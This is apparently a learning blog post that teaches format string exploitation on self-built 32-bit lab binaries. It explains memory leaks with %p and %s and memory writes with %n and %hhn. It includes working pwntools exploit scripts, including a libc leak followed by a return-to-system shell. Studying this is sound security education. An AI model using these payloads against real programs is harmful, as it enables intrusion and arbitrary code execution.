[pwn learning] Format string vulnerability

What is a format string vulnerability

A format string function accepts a variable number of arguments, takes the first one as the format string, and interprets the remaining arguments according to it. Broadly speaking, such functions convert data held in memory into a human-readable string. Almost every C/C++ program uses them to print information, debug, or process strings. Three things are involved: the format string function, the format string itself, and the optional arguments that follow it.

Format string functions

  • Input: scanf

  • Output: printf

Format string

Basic format

%[parameter][flags][field width][.precision][length]type

Fields that matter in pwn

  • parameter
    • n$, selects the n-th argument of the format string function
  • length
    • hh, treat the argument as a 1-byte value (char)
    • h, treat the argument as a 2-byte value (short)
  • type
    • d/i, signed integer
    • u, unsigned integer
    • x/X, hexadecimal unsigned integer
    • o, octal unsigned integer
    • s, string: prints the bytes at the pointer argument up to the terminating null byte
    • p, pointer value
    • c, single character
    • n, prints nothing, but writes the number of characters output so far to the variable that the corresponding integer pointer argument points to
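
To make the field layout concrete, here is a minimal sketch that splits a single conversion specification into the fields listed above. The regular expression and the `parse_spec` helper are illustrative assumptions, not part of any library, and they only cover the common flags and length modifiers.

```python
import re

# %[parameter][flags][field width][.precision][length]type
SPEC = re.compile(
    r'%(?:(?P<parameter>\d+)\$)?'        # n$  : explicit argument position
    r'(?P<flags>[-+ #0]*)'               # flags
    r'(?P<width>\d+|\*)?'                # field width
    r'(?:\.(?P<precision>\d+|\*))?'      # .precision
    r'(?P<length>hh|h|ll|l|L|z|j|t)?'    # length modifier
    r'(?P<type>[diuoxXfFeEgGaAcspn%])'   # conversion type
)

def parse_spec(spec):
    """Return the non-empty fields of one conversion specification."""
    match = SPEC.fullmatch(spec)
    if match is None:
        raise ValueError(f'not a conversion specification: {spec!r}')
    return {name: value for name, value in match.groupdict().items() if value}

print(parse_spec('%7$hhn'))  # {'parameter': '7', 'length': 'hh', 'type': 'n'}
print(parse_spec('%4.2f'))   # {'width': '4', 'precision': '2', 'type': 'f'}
```

The first example is the kind of specifier used for byte-wise writes later on: argument 7, 1-byte length, type n.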

So what can be done with this? Consider the following example program

// test.c
// gcc test.c -m32 -o test
#include <stdio.h>

int main(int argc, char *argv[])
{
        // Deliberately broken: three conversions, but no matching arguments
        printf("Color %s, Number %d, Float %4.2f");
        return 0;
}

What happens when printf is called without the arguments that the format string expects?

root@kali:~/ctf/Other/pwn/fmtstrTest# ./test
Color !{��, Number -5021172, Float -13609363015660276767861975804845741867148812000057244728627349647521205925006820418315482418654746428935787248312989741686623617507326100836271030992971258520059038764468552397903024091741864220914512543638279560963003911187719312179301466854378314065568140994293458123131936020891717710705342044204066406400.00

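The program still runs. printf simply takes the three values stored above the format string pointer on the stack and interprets them in turn as a string pointer (%s), an int (%d), and a double (%4.2f). If the value used for %s is not a valid pointer, the program crashes instead.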
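
The reinterpretation can be sketched with Python's struct module. This is a simplified model that assumes a 32-bit little-endian target, where %s and %d each consume one 4-byte stack slot and a double consumes two. The `reinterpret_slots` helper is hypothetical, and the double in the usage lines is a made-up value chosen so the result is easy to check.

```python
import struct

def reinterpret_slots(words):
    """Interpret four 32-bit stack slots the way "%s %d %f" would.

    words: the four slots that follow the format string pointer.
    """
    string_ptr = words[0]                                    # %s: used as a char *
    (number,) = struct.unpack('<i', struct.pack('<I', words[1]))   # %d: signed int
    (real,) = struct.unpack('<d', struct.pack('<II', words[2], words[3]))  # %f: 8 bytes
    return string_ptr, number, real

# 0xffb3620c read as a signed int is the "Number" printed in the run above
ptr, number, real = reinterpret_slots([0x08048034, 0xffb3620c, 0x00000000, 0x3ff80000])
print(number)  # -5021172
print(real)    # 1.5
```

A slot value such as 0xffb3620c looks like a stack address, which is why the "Number" field in the output above is a large negative integer.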


Leak memory

  • %X$p: leak the value at the X-th position on the stack

    • X is any positive integer
  • addr%X$s: disclose the data at an arbitrary address

    • Assumes that the format string itself starts at the X-th argument position on the stack, so that %X$s uses addr as its pointer

    • addr is the address to be disclosed

      Take the following program as an example

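      // test2.c
      #include <stdio.h>
      #include <unistd.h>
      // Function bodies reconstructed (assumption): the original listing lost them
      void foo(void) { puts("bbbb"); }  // only needs to embed the string "bbbb"
      int main(int argc, char *argv[]) {
              char buf[100];
              read(0, buf, 100);
              printf(buf);  // user input used as the format string
              return 0;
      }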

      This program contains the string bbbb. First use static analysis to find where the string is stored (0x0804a008 in my test environment), then use the format string to print the contents at that address

      from pwn import *
      conn = process('./test2')
      # After the input is read, the 4 address bytes sit at the 7th position on the stack
      payload = p32(0x0804a008) + b'%7$s'
      conn.send(payload)
      print(conn.recv())

      The output of the run shows the string stored at address 0x0804a008

      [+] Starting local process './test2': pid 92179
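
The addr%X$s pattern can be sketched without pwntools. Here `p32` is a local stand-in for the pwntools function of the same name, and `leak_payload` is a hypothetical helper. The check for null bytes reflects the fact that printf stops parsing the format string at the first \x00, so an address containing one cannot be placed at the front.

```python
import struct

def p32(value):
    """Pack a 32-bit little-endian integer (stand-in for pwntools' p32)."""
    return struct.pack('<I', value)

def leak_payload(addr, position):
    """Build addr + '%<position>$s' to print the string stored at addr.

    position is where the start of the input lands among printf's arguments.
    """
    packed = p32(addr)
    if b'\x00' in packed:
        raise ValueError('address contains a null byte; printf would stop there')
    return packed + f'%{position}$s'.encode()

print(leak_payload(0x0804a008, 7))  # b'\x08\xa0\x04\x08%7$s'
```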

Example: using a format string vulnerability to obtain the libc base address

Take the following program as an example

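// test3.c
// gcc test3.c -m32 -no-pie -fno-stack-protector -o test3

#include <stdio.h>
#include <unistd.h>

void vul(void){
      char buf[40];
      char buf2[20];
      read(0, buf, 40);
      printf(buf);         // format string vulnerability (visible in the disassembly)
      read(0, buf2, 100);  // stack overflow: up to 100 bytes into a 20-byte buffer
}

int main(int argc, char *argv[]){
      vul();               // call restored; the original listing lost it
      return 0;
}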

1. Check the security mitigations
[*] '/root/ctf/Other/pwn/fmtstrTest/test3'
  Arch:     i386-32-little
  RELRO:    Partial RELRO
  Stack:    No canary found
  NX:       NX enabled
  PIE:      No PIE (0x8048000)
2. Static analysis

Static analysis finds no ready-made dangerous function and no usable string in the binary.

The disassembly shows that the second read in the vul function overflows the stack, and that printf is called with user input as its format string

...
|           0x080491a9      6a28           push 0x28                   ; '(' ; 40
|           0x080491ab      8d45d0         lea eax, dword [var_30h]
|           0x080491ae      50             push eax
|           0x080491af      6a00           push 0
|           0x080491b1      e87afeffff     call sym.imp.read
|           0x080491b6      83c410         add esp, 0x10
|           0x080491b9      83ec0c         sub esp, 0xc
|           0x080491bc      8d45d0         lea eax, dword [var_30h]
|           0x080491bf      50             push eax
|           0x080491c0      e87bfeffff     call sym.imp.printf
|           0x080491c5      83c410         add esp, 0x10
|           0x080491c8      83ec04         sub esp, 4
|           0x080491cb      6a64           push 0x64                   ; 'd' ; 100
|           0x080491cd      8d45bc         lea eax, dword [var_44h]
|           0x080491d0      50             push eax
|           0x080491d1      6a00           push 0
|           0x080491d3      e858feffff     call sym.imp.read
...
3. Payload

Based on the static analysis, the plan is to use the format string to leak the libc base address, then use the overflow to get a shell.

First, find the position of the format string on the stack:

root@kali:~/ctf/Other/pwn/fmtstrTest# ./test3
hello
aaaa%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-
aaaa0xffbdf378-0x28-0x804918e-(nil)-(nil)-0x8048034-0xf7ef1a28-0xf7ef0000-0xf7f21230-0x61616161-0x252d7025-0x70252d70-0��ro

aaaa (0x61616161) appears at the 10th position on the stack
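
Counting the fields by hand is error-prone, so the search can be automated. The sketch below assumes the echoed text consists of the marker followed by %p values separated by "-", as in the run above. `find_offset` is a hypothetical helper, and the trailing garbage bytes of the real output are left out of the sample string.

```python
def find_offset(echo, marker='aaaa'):
    """Return the 1-based position whose %p value equals the marker bytes.

    echo is the text printed back for an input of marker + '%p-%p-...'.
    Returns None if the marker value does not appear.
    """
    # On a little-endian target 'aaaa' is read back as 0x61616161
    wanted = hex(int.from_bytes(marker.encode(), 'little'))
    if echo.startswith(marker):
        echo = echo[len(marker):]
    for position, field in enumerate(echo.split('-'), start=1):
        if field == wanted:
            return position
    return None

echo = ('aaaa0xffbdf378-0x28-0x804918e-(nil)-(nil)-0x8048034-0xf7ef1a28-'
        '0xf7ef0000-0xf7f21230-0x61616161-0x252d7025-0x70252d70-')
print(find_offset(echo))  # 10
```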

Next, use the format string vulnerability to leak the runtime address of a libc function, which identifies the libc in use. Here the address of read is leaked as an example

payload_1 = p32(read_got) + b'%10$s'

The actual address of read can then be extracted from the response

read_addr = u32(conn.recv()[4:8])  # [0:4] is the address of read_got, [4:8] is the value stored at read_got

The length of the output can vary, because %s prints a string: printing continues until a terminating null byte (\x00) is reached.
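
Because of this, the slice [4:8] is only meaningful when at least four bytes were printed after the echoed address. A minimal sketch of a defensive parser follows; `parse_leak` is a hypothetical helper, and the sample response uses made-up addresses.

```python
import struct

def parse_leak(response):
    """Extract the 32-bit value printed by addr + '%N$s'.

    response[0:4] is the echoed address, response[4:8] the leaked pointer.
    """
    leaked = response[4:8]
    if len(leaked) < 4:
        # %s stopped early: the stored pointer contains a null byte
        raise ValueError('leak truncated by a null byte; try another GOT entry')
    (value,) = struct.unpack('<I', leaked)
    return value

# Made-up example: echoed GOT address, leaked pointer, then trailing bytes
response = struct.pack('<II', 0x0804c00c, 0xf7e5c350) + b'\x10\x20'
print(hex(parse_leak(response)))  # 0xf7e5c350
```

Raising an error instead of padding with zeros is a deliberate choice here: the bytes after the null byte are unknown, so a padded value would be wrong.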

Then use LibcSearcher to identify the libc, and from it compute the addresses of system and /bin/sh
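
The address arithmetic behind this step is simple: subtract the symbol's offset inside libc from its leaked runtime address to get the base, then add the offsets of the other symbols. The sketch below uses hypothetical offsets purely for illustration; real values depend on the libc version and would come from LibcSearcher or the libc file itself. `resolve` is also a hypothetical helper.

```python
def resolve(leak_addr, offsets, leaked_name='read'):
    """Return (libc_base, {name: runtime address}) from one leaked symbol."""
    base = leak_addr - offsets[leaked_name]
    if base & 0xfff:
        # Libraries are mapped at page boundaries, so this hints at a wrong libc
        raise ValueError('libc base is not page-aligned; wrong libc guess?')
    return base, {name: base + off for name, off in offsets.items()}

# Hypothetical offsets, not taken from any real libc
offsets = {'read': 0xe5c50, 'system': 0x3d200, 'str_bin_sh': 0x17e0cf}
base, addrs = resolve(0xf7de5c50, offsets)
print(hex(base))             # 0xf7d00000
print(hex(addrs['system']))  # 0xf7d3d200
```

The page-alignment check is a cheap sanity test: if the computed base does not end in 000, the leaked address was probably matched against the wrong libc.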

4. Exploit script
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
conn = process('./test3')

elf = conn.elf
func_name = 'read'
leak_got = elf.got[func_name]

# leak libc base
payload = p32(leak_got) + b'%10$s'
conn.send(payload)  # consumed by the first read(), then passed to printf
recvstr = conn.recv()
leak_addr = u32(recvstr[4:8])
print(f'Get leak address: {hex(leak_addr)}')

libc = LibcSearcher(func_name, leak_addr)
libc_base = leak_addr - libc.dump(func_name)

# getshell
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = b'a' * (0x44 + 0x4)  # buf2 is at ebp-0x44, plus 4 bytes of saved ebp
payload += p32(system) + p32(0) + p32(binsh)
conn.send(payload)  # consumed by the second read(), overflows buf2
conn.interactive()

Overwrite memory

The previous sections used format string vulnerabilities to leak stack contents and arbitrary memory. This section shows how to overwrite memory.

The key conversion is

%n, prints nothing, but writes the number of characters output so far to the variable that the corresponding integer pointer argument points to.
  • %Yc%X$n: write Y to the location pointed to by the pointer at the X-th position on the stack
    • Y: the value to write
    • X: any positive integer
    • To write to an arbitrary address, use addr%(Y-4)c%X$n: the 4 address bytes are printed first, so only Y-4 padding characters are needed
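
The addr%(Y-4)c%X$n pattern can be written as a small builder. This is a sketch for a 32-bit little-endian target; `p32` is a local stand-in for the pwntools function and `write_payload` is a hypothetical helper. The address used in the usage line is the one printed for c in the test4 run later in this article.

```python
import struct

def p32(value):
    """Pack a 32-bit little-endian integer (stand-in for pwntools' p32)."""
    return struct.pack('<I', value)

def write_payload(addr, value, position):
    """Build addr + '%(value-4)c' + '%<position>$n' to store value at addr.

    The 4 address bytes are printed first, so value must be at least 4.
    """
    if value < 4:
        raise ValueError('the address alone already prints 4 characters')
    padding = value - 4
    pad_spec = f'%{padding}c'.encode() if padding else b''
    return p32(addr) + pad_spec + f'%{position}$n'.encode()

print(write_payload(0xffc3a29c, 16, 6))  # b'\x9c\xa2\xc3\xff%12c%6$n'
```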

Overwriting a stack variable

Take the following program as an example

// test4.c
// gcc test4.c -m32 -no-pie -fno-stack-protector -o test4
#include <stdio.h>
int a = 123, b = 456;
int main() {
  int c = 789;
  char s[100];
  printf("%p\n", &c);
  scanf("%s", s);
  printf(s);
  if (c == 16) {
    puts("modified c.");
  } else if (a == 2) {
    puts("modified a for a small number.");
  } else if (b == 0x12345678) {
    puts("modified b for a big number!");
  }
  return 0;
}

First, find the position of the format string on the stack. As shown below, it is at the 6th position

root@kali:~/ctf/Other/pwn/fmtstrTest# ./test4
0xffc3a29c
aaaa%p-%p-%p-%p-%p-%p-%p-%p-%p
aaaa0xffc3a238-0xf7f69410-0x8049199-(nil)-0x1-0x61616161-0x252d7025-0x70252d70-0x2d70252d
  • Try to reach the "modified c." branch

The value of c must change from 789 to 16. The program prints the address of c, so place that address on the stack at the start of the input and then write 16 to it with %n.

from pwn import *
context.log_level = 'debug'
conn = process('./test4')
c_addr = int(conn.recvuntil(b'\n').split(b'\n')[0], 16)
# c_addr takes up 4 bytes, so 12 more characters are printed to make %n store 16 at c_addr
payload = p32(c_addr) + b'%12c' + b'%6$n'
conn.sendline(payload)
print(conn.recvall())

Writing a small number

Use radare2 to obtain the addresses of a and b

[0x08049070]> iE
Num Paddr      Vaddr      Bind     Type Size Name
048 0x00003028 0x0804c028 GLOBAL    OBJ    4 b
062 0x00003024 0x0804c024 GLOBAL    OBJ    4 a

Now try to reach the a == 2 branch.

With the previous method, the address alone already accounts for 4 printed bytes, so the smallest value that can be written is 4.

Instead, place the address after the format specifier.

To write 2, use aa%X$n, which stores 2 at the location pointed to by the X-th position. The format string starts at position 6. aa%X$n is 6 bytes long, which is not a multiple of 4, so pad it with two more characters to 8 bytes (two stack slots). The address of a then follows and lands at the 8th position on the stack.

The final payload is aa%8$nbb\x24\xc0\x04\x08
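
The position of a trailing address depends on the length of the specifier, which in turn depends on the number of digits in the position, so the calculation can be done as a small fixed-point loop. The sketch below assumes a 32-bit target with 4-byte stack slots; `tail_address_payload` is a hypothetical helper.

```python
import struct

def tail_address_payload(addr, value, first_slot, pad=b'b'):
    """Print `value` characters, then %N$n, with the address placed last.

    first_slot is the stack position where the payload starts. The loop
    repeats until the position used in %N$n matches where addr really lands.
    """
    position = first_slot
    while True:
        fmt = b'a' * value + f'%{position}$n'.encode()
        fmt += pad * (-len(fmt) % 4)              # align the address to a slot
        landed = first_slot + len(fmt) // 4       # slot that will hold addr
        if landed == position:
            return fmt + struct.pack('<I', addr)
        position = landed

print(tail_address_payload(0x0804c024, 2, 6))  # b'aa%8$nbb$\xc0\x04\x08'
```

In the printed bytes, `$` is simply how Python displays the byte 0x24, the low byte of the address of a.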

Full script

from pwn import *
context.log_level = 'debug'
conn = process('./test4')
c_addr = int(conn.recvuntil(b'\n').split(b'\n')[0], 16)  # consume the printed address of c (unused here)

payload = b'aa%8$nbb' + p32(0x0804c024)
conn.sendline(payload)
print(conn.recvall())


Writing a large number

Reaching the b == 0x12345678 branch requires writing a large number. Printing that many characters in one go is impractical, so write the value piece by piece using the hh and h length modifiers

hh  single byte
h   double byte

Here we write one byte at a time. The address of b is 0x0804c028, so after the byte-by-byte writes the memory should look like this

0x0804c028 	\x78
0x0804c029	\x56
0x0804c02a	\x34
0x0804c02b	\x12

The count written by %n only grows as the payload is processed, so the bytes must be written in ascending order of value. Here that means starting with the highest byte (0x12) and ending with the lowest (0x78)
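
The split into single-byte writes and their ordering can be sketched as follows, assuming a little-endian target. `byte_writes` is a hypothetical helper.

```python
def byte_writes(addr, value, size=4):
    """Split value into (address, byte) pairs, sorted by byte value.

    Little-endian: the lowest byte of value lives at the lowest address.
    Sorting by byte value matches the order in which %hhn can write them.
    """
    data = value.to_bytes(size, 'little')
    pairs = [(addr + index, byte) for index, byte in enumerate(data)]
    return sorted(pairs, key=lambda pair: pair[1])

for address, byte in byte_writes(0x0804c028, 0x12345678):
    print(hex(address), hex(byte))
# 0x804c02b 0x12
# 0x804c02a 0x34
# 0x804c029 0x56
# 0x804c028 0x78
```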

payload = p32(0x0804c02b) + b'a'*(0x12 - 4) + b'%6$hhn'	# Current total length = 24, character length 0x12

Next, write the second-highest byte. Because everything is sent as a single payload, the length of the preceding part must be taken into account.

The payload so far is 24 bytes long, so the address of the second-highest byte occupies bytes 25-28, which corresponds to the 12th position on the stack (24 / 4 + 6).

When computing the padding for the second-highest byte, do not count the length of %6$hhn, because it produces no output. The number of padding characters is therefore the value of the second-highest byte, minus the number of characters already output, minus the 4 bytes of its own address.

Another address follows this part of the payload, so it must stay aligned. Three b's are appended so that the total length is a multiple of 4.

payload += p32(0x0804c02a) + b'a'*(0x34 - 0x12 - 4) + b'%12$hhn' + b'bbb' # Current total length = 68

Next, write the second-lowest byte. The construction is the same, but remember to subtract the three bbb alignment characters, which are also output, when computing the padding.

payload += p32(0x0804c029) + b'a'*(0x56 - 0x34 - 4 - 3) + b'%23$hhn' + b'bb' # Current total length = 108

Finally, write the lowest byte

payload += p32(0x0804c028) + b'a'*(0x78- 0x56 - 4 - 2) + b'%33$hhn'
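
The paddings and positions can be double-checked without running the target. The sketch below is a toy model of printf, not a real implementation: it assumes the payload starts at stack position 6, that every byte outside a %N$hhn specifier is echoed as one character, and that no other conversions occur. `p32` is a local stand-in for the pwntools function and `simulate_hhn` is a hypothetical helper.

```python
import re
import struct

def p32(value):
    """Pack a 32-bit little-endian integer (stand-in for pwntools' p32)."""
    return struct.pack('<I', value)

def simulate_hhn(payload, first_slot):
    """Return {address: byte written} for a payload made of text and %N$hhn."""
    spec = re.compile(rb'%(\d+)\$hhn')
    memory, printed, i = {}, 0, 0
    while i < len(payload):
        match = spec.match(payload, i)
        if match:
            # Position N refers to a 4-byte slot inside the payload itself
            slot = int(match.group(1)) - first_slot
            (addr,) = struct.unpack_from('<I', payload, slot * 4)
            memory[addr] = printed & 0xff   # hh keeps only the low byte
            i = match.end()
        else:
            printed += 1                    # ordinary byte: echoed as-is
            i += 1
    return memory

payload = p32(0x0804c02b) + b'a' * (0x12 - 4) + b'%6$hhn'
payload += p32(0x0804c02a) + b'a' * (0x34 - 0x12 - 4) + b'%12$hhn' + b'bbb'
payload += p32(0x0804c029) + b'a' * (0x56 - 0x34 - 4 - 3) + b'%23$hhn' + b'bb'
payload += p32(0x0804c028) + b'a' * (0x78 - 0x56 - 4 - 2) + b'%33$hhn'

memory = simulate_hhn(payload, first_slot=6)
b_value = sum(memory[0x0804c028 + i] << (8 * i) for i in range(4))
print(hex(b_value))  # 0x12345678
```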

Full script

from pwn import *
context.log_level = 'debug'
conn = process('./test4')

payload = p32(0x0804c02b) + b'a'*(0x12 - 4) + b'%6$hhn'
payload += p32(0x0804c02a) + b'a'*(0x34 - 0x12 - 4) + b'%12$hhn' + b'bbb'
payload += p32(0x0804c029) + b'a'*(0x56 - 0x34 - 4 - 3) + b'%23$hhn' + b'bb'
payload += p32(0x0804c028) + b'a'*(0x78 - 0x56 - 4 - 2) + b'%33$hhn'
conn.sendline(payload)
print(conn.recvall())



Overwriting an arbitrary address by hand means computing many padding lengths and stack positions, which is tedious. Fortunately this wheel has already been built: pwntools provides fmtstr_payload in its fmtstr module.

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

  • offset (int): position of the format string on the stack

  • writes (dict): target addresses and the values to write, {target_addr: change_to}

  • numbwritten (int): number of bytes already written by the printf function, 0 by default

  • write_size (str): write byte by byte, short by short, or int by int ('byte', 'short', or 'int'), 'byte' by default

from pwn import *
context.log_level = 'debug'
conn = process('./test4')

# a
# payload = fmtstr_payload(6, {0x0804c024:0x2})

# b
payload = fmtstr_payload(6, {0x0804c028:0x12345678})
conn.sendline(payload)
print(conn.recvall())


Studying the tool's output also suggests a shorter way to build the payload, with all the format specifiers first and the addresses at the end

payload = b'%18c%17$hhn' + b'%34c%18$hhn' + b'%34c%19$hhn' + b'%34c%20$hhn' + p32(0x0804c02b) + p32(0x0804c02a) + p32(0x0804c029) + p32(0x0804c028)
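
This specifiers-first layout can be generated mechanically. The sketch below is a simplified illustration for a single 32-bit value on a little-endian target, and it is not how pwntools implements fmtstr_payload. `compact_payload` is a hypothetical helper. It iterates until the positions in the specifiers agree with where the addresses actually land.

```python
import struct

def compact_payload(first_slot, addr, value, size=4):
    """Build '%Nc%P$hhn' groups followed by the target addresses."""
    # One (address, byte) pair per byte, in ascending order of byte value
    writes = sorted(
        ((addr + i, b) for i, b in enumerate(value.to_bytes(size, 'little'))),
        key=lambda write: write[1],
    )
    first = first_slot
    while True:
        fmt, printed = b'', 0
        for k, (_, byte) in enumerate(writes):
            delta = (byte - printed) % 256      # characters still to print
            if delta:
                fmt += f'%{delta}c'.encode()
                printed += delta
            fmt += f'%{first + k}$hhn'.encode()
        fmt += b'a' * (-len(fmt) % 4)           # align the address block
        landed = first_slot + len(fmt) // 4     # slot of the first address
        if landed == first:
            break
        first = landed
    return fmt + b''.join(struct.pack('<I', a) for a, _ in writes)

payload = compact_payload(6, 0x0804c028, 0x12345678)
print(payload[:44])  # b'%18c%17$hhn%34c%18$hhn%34c%19$hhn%34c%20$hhn'
```

For b at 0x0804c028 and position 6, this reproduces the 44-byte specifier block of the payload above, followed by the same four addresses.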


Added by jiayanhuang on Wed, 29 Dec 2021 18:52:22 +0200